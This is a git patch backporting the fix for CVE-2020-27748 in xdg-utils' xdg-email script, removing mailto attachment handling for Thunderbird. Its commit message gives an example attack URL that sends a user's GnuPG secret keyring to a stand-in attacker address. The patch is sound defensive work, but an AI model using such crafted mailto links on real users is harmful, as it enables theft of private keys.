1From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 2From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> 3Date: Tue, 18 Aug 2020 16:52:24 +0100 4Subject: [PATCH] xdg-email: remove attachment handling from mailto 5MIME-Version: 1.0 6Content-Type: text/plain; charset=UTF-8 7Content-Transfer-Encoding: 8bit 8 9This allows attacker to extract secrets from users: 10 11mailto:sid@evil.com?attach=/.gnupg/secring.gpg 12 13See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 14and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 15 16Signed-off-by: Jörg Thalheim <joerg@thalheim.io> 17--- 18 scripts/xdg-email.in | 7 +------ 19 1 file changed, 1 insertion(+), 6 deletions(-) 20 21Upstream-Status: Backport 22CVE: CVE-2020-27748 23 24diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in 25index 6db58ad..5d2f4f3 100644 26--- a/scripts/xdg-email.in 27+++ b/scripts/xdg-email.in 28@@ -32,7 +32,7 @@ _USAGE 29 30 run_thunderbird() 31 { 32- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH 33+ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY 34 THUNDERBIRD="$1" 35 MAILTO=$(echo "$2" | sed 's/^mailto://') 36 echo "$MAILTO" | grep -qs "^?" 37@@ -48,7 +48,6 @@ run_thunderbird() 38 BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) 39 SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) 40 BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) 41- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) 42 43 if [ -z "$TO" ] ; then 44 NEWMAILTO= 45@@ -68,10 +67,6 @@ run_thunderbird() 46 NEWMAILTO="${NEWMAILTO},$BODY" 47 fi 48 49- if [ -n "$ATTACH" ] ; then 50- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" 51- fi 52- 53 NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') 54 DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" 55 "$THUNDERBIRD" -compose "$NEWMAILTO" 56-- 57GitLab 58 59